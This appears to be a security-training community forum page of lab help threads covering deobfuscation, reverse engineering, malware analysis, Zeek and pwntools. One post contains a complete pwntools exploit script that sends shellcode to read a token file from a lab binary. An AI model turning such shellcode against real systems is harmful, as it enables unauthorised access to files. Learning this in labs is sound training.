PowerShell Deobfuscation: Ep 8 help
I have been stuck on this EP for a week and haven't been able to progress. I am hoping someone can give me a hint to help me get through this one. Here is what I have done so far. I take the original encoded message and apply "FromBase64" and then "Raw Inflate" and I get the following data: You can see it outputs another command that also needs to decoded using the same steps above. That output gives you this... It outputs a string of characters but no obvious way to get this readable. I have tried bit-shifting, rotating characters, and a bunch of other tests and nothing has shown me anything that is remotely readable. I assume I am missing something simple but every time I read it back through, I don't see what I missed. Any help you can provide would be greatly appreciated.5Views0likes0CommentsNeed Help for Pwntools: Ep. 6 — Demonstrate Your Skills
I'm trying to solve an lab in Immersive labs Pwntools: Ep. 6 — Demonstrate Your Skills And I got stuck in the last step. I've tried the solution for using cat2 (from https://www.reddit.com/r/immersivelabs/comments/1ap3tub/pwntools_ep_6_demonstrate_your_skills/) but it is still not working. Could you please help me with this if possible shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0) is what I tried from pwn import * import struct # Start the challenge binary p = process("/opt/demonstrate-challenge") # Use the correct path # === Part 1: Solve Arithmetic Challenge === p.recvuntil(b"What is the sum of ") numbers = p.recvline().decode().strip().split(" and ") num1 = int(numbers[0]) num2 = int(numbers[1].split("?")[0]) print(f"[+] Solving: {num1} + {num2} = {num1 + num2}") p.sendline(str(num1 + num2)) # === Part 2: Solve Packing Challenge === p.recvuntil(b"Send me back the following two 32-bit unsigned integers packed in little-endian order:\n") values = p.recvline().decode().strip().split(" and ") val1 = int(values[0]) val2 =int(values[1]) print(f"[+] Packing values: {val1} and {val2}") payload = struct.pack("<II", val1, val2) p.send(payload) # === Part 3: Leak Address of parsing_check() === elf = ELF("/opt/demonstrate-challenge") # Load the ELF binary parsing_check_addr = elf.symbols['parsing_check'] # Get function address print(f"[+] Found parsing_check() address: {hex(parsing_check_addr)}") p.sendline(str(parsing_check_addr)) # === Part 4: Send Shellcode to Read /home/token-user/token.txt === file_path = '/home/token-user/token.txt' shellcode = shellcraft.cat2(file_path, 1, 40) # Pwntools shellcode shellcode += shellcraft.ret() # Ensure proper return assembled_shellcode = asm(shellcode) p.send(assembled_shellcode) # === Get Flag Output === response = p.recvall() print(response)90Views1like10CommentsHistoric Steganography Lab
I've been stuck on question 6 in the Stenography lab within the Historic Encryption upskill series. I'm not sure if I'm missing something within the command line or if the password/passphrase for the file is wrong. The password/passphrase is supposed to be "carnivale" Here are some screenshots to help zero in where I'm at. Thanks all!Solved41Views2likes2CommentsThreat Research: AMPscript Analysis
This is one of those labs that I return to periodically and then abandon after half an hour whilst scratching my head........Does anyone have any pointers about how to approach this? Which fields need to be populated in the webform? & which Test Contact Key is used? The one that's prepopulated: acb1730c-c3dc-4c1a-ad3d-207216370def or the one in the briefing: e2e6555a-64a5-43ed-984e-1d342780b72f many thanks in advance - Gus123Views1like13CommentsHelp again Linux CLI: Ep.16 – Combining Commands
I feel like I'm banging my head against the wall with the last 2 questions of this lab. I've been stuck on question 5 for the grep command. Any hints of what am I doing wrong? missing? And then the last question to run sleep. Huh? Is there a command to combine with the sleep 600? Any help would be appreciated. So I can finally do the last lab for Linux. =)Solved49Views1like2CommentsRadare2 Reverse Engineering: Ep.1 – Windows Binary Part 1
I have managed to find the answers to all of the questions within this lab except for question 6. I can not seem to figure out the appropriate step(s) or action(s) to take find the correct answer for this question. Any insight or guidance on what I'm missing / doing incorrectly and how to correct it would be greatly appreciated. I have provided a few screenshots for reference. Thanks in advance.76Views2likes6CommentsMalware Analysis: Shlayer
I've done the first 2 questions but stuck on the 3rd - what is the XOR key? Is this found in the first or second stage 7z compressed file? and....the lab description mentions Cyberchef - is this available in the lab? (as you cannot copy and paste out of this lab) I just have this and the Qakbot one to complete than I have the "malware analysis badge"Solved76Views1like8CommentsZeek Ep 4 Scripting
Question 10 "After editing the required file, try to execute the script stated in Question 9 again. How many scans of unique ports are made from the IP address" I don't understand what is wrong with my syntax. cat conn.log | zeek-cut id.orig_h id.resp_p| sort -u | wc -l my thought process is that I'm grabbing the unique ports using sort -u from id.resp_p coming from id.orig_h. Then i do a count. I keep getting the wrong answer.Solved34Views0likes3Comments